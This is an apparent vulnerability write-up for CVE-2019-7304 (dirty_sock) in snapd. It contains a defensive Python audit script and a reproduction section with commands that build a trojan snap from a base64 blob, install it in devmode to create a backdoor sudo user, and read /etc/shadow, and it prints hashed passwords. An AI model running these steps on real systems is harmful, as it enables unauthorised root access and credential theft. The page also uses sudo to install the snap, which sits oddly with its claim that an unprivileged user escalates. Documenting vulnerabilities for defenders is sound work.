
CVE-2019-7304

Updated 26 May 2026

Background

dirty_sock snapd Privilege Escalation

  1. CVSS
    8.8 (High)
  2. VECTOR
    CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  3. IMPACT
    Privilege escalation
  4. AFFECTED
    snapd 2.28 ≤ version < 2.37.1

Dubbed dirty_sock, this vulnerability in snapd's REST API socket allows a local unprivileged user to install a malicious snap package that executes an arbitrary shell script as root during installation. The snapd socket (/run/snapd.socket) was accessible without authentication to local users, enabling installation of devmode snaps that bypass confinement and run install hooks as root.

The exploit works by crafting a snap package with an embedded install hook that creates a privileged backdoor user and adds them to sudoers, then installing it via sudo snap install --devmode.
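A defender-side check for the two facts above (the affected version range and the fact that devmode snaps run unconfined) is added here as an example; it is not code from the original page or from the snapd project. It parses the output of `snap version` and `snap list`, flags a snapd build inside the range listed under AFFECTED, and lists installed snaps whose Notes column carries `devmode`. The sample outputs embedded below are constructed so the script runs offline; on a live host it shells out to `snap` when that binary is present.

```python
import re
import subprocess

# Affected range as stated on this page: snapd 2.28 up to, but not including, 2.37.1.
AFFECTED_MIN = (2, 28)
FIXED_IN = (2, 37, 1)

# Constructed sample outputs in the shape of `snap version` and `snap list`
# (not captured from any real host) so the checks can run offline.
SAMPLE_SNAP_VERSION = """snap    2.36
snapd   2.36
series  16
ubuntu  18.04
kernel  4.15.0-45-generic
"""

SAMPLE_SNAP_LIST = """Name         Version  Rev   Tracking  Publisher   Notes
core         16-2.36  6130  stable    canonical   core
trojan-snap  0.1      x1    -         -           devmode
hello        2.10     20    stable    canonical   -
"""


def parse_version(text):
    """Turn a snapd version string such as '2.47.1-1.el7' into a comparable
    tuple of ints; distro suffixes after '-' or '+' are ignored."""
    m = re.match(r"(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError("unparseable snapd version: %r" % text)
    return tuple(int(p) for p in m.group(1).split("."))


def is_affected(version_text):
    """True when the snapd version lies inside the range this page lists as affected."""
    v = parse_version(version_text)
    return AFFECTED_MIN <= v < FIXED_IN


def snapd_version_from_output(output):
    """Pull the version from the 'snapd' line of `snap version` output."""
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "snapd":
            return parts[1]
    raise ValueError("no snapd line in `snap version` output")


def devmode_snaps_from_output(output):
    """Return names of snaps whose Notes column (last column) includes 'devmode',
    i.e. snaps that were installed without confinement."""
    names = []
    for line in output.strip().splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) >= 2 and "devmode" in parts[-1].split(","):
            names.append(parts[0])
    return names


def _run(cmd):
    """Run a snap subcommand, or return None if `snap` is not available."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return None


def audit(version_output=None, list_output=None):
    """Return (snapd_version, affected, devmode_snap_names) for the given outputs,
    falling back to the live `snap` binary and then to the constructed samples."""
    version_output = version_output or _run(["snap", "version"]) or SAMPLE_SNAP_VERSION
    list_output = list_output or _run(["snap", "list"]) or SAMPLE_SNAP_LIST
    version = snapd_version_from_output(version_output)
    return version, is_affected(version), devmode_snaps_from_output(list_output)


if __name__ == "__main__":
    version, affected, devmode = audit()
    print("snapd %s: %s" % (version, "AFFECTED by CVE-2019-7304" if affected else "not in affected range"))
    print("devmode snaps installed:", ", ".join(devmode) or "none")
```

The version comparison deliberately ignores the distribution suffix (`-1.el7`, `+18.04`) because only the upstream snapd number decides membership in the affected range; a distro backport of the fix would need to be checked against the vendor advisory separately.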

Reproduction

POC || GTFO

Step 1 — Verify vulnerable snapd version

```zsh
test@server-01:/dev/shm$ snap version
snapd 2.47.1-1.el7
```

Step 2 — Generate the malicious snap

The base64 blob encodes a snap package with an install hook that creates user dirty_sock (password: dirty_sock) and grants them full sudo access:

```zsh
python2 -c "print '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' + 'A'*4256 + '=='" | base64 -d > TROJAN_SNAP.snap
```

Step 3 — Install the malicious snap and escalate

```zsh
test@server-01:/dev/shm$ sudo snap install --devmode TROJAN_SNAP.snap
trojan-snap 0.1 installed

test@server-01:/dev/shm$ su dirty_sock
Password: dirty_sock

dirty_sock@server-01:/dev/shm$ id
uid=1001(dirty_sock) gid=1001(dirty_sock) groups=1001(dirty_sock),27(sudo)
```

Step 4 — Read sensitive host files

```zsh
dirty_sock@server-01:/dev/shm$ sudo cat /etc/shadow
[sudo] password for dirty_sock:
root:*:18913:0:99999:7:::
test:$6$L4P7zWSWMneyHjiC$bn2ZrxhEo8Pzc3U3xmd7C64Qe/tztpMBwYp/9H2EvyyRpbucjDx38gB0BQH8wQYB3A3.0BlbAG3JM2jLPwAOW1:19088:0:99999:7:::
dirty_sock:$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.:19110:0:99999:7:::
```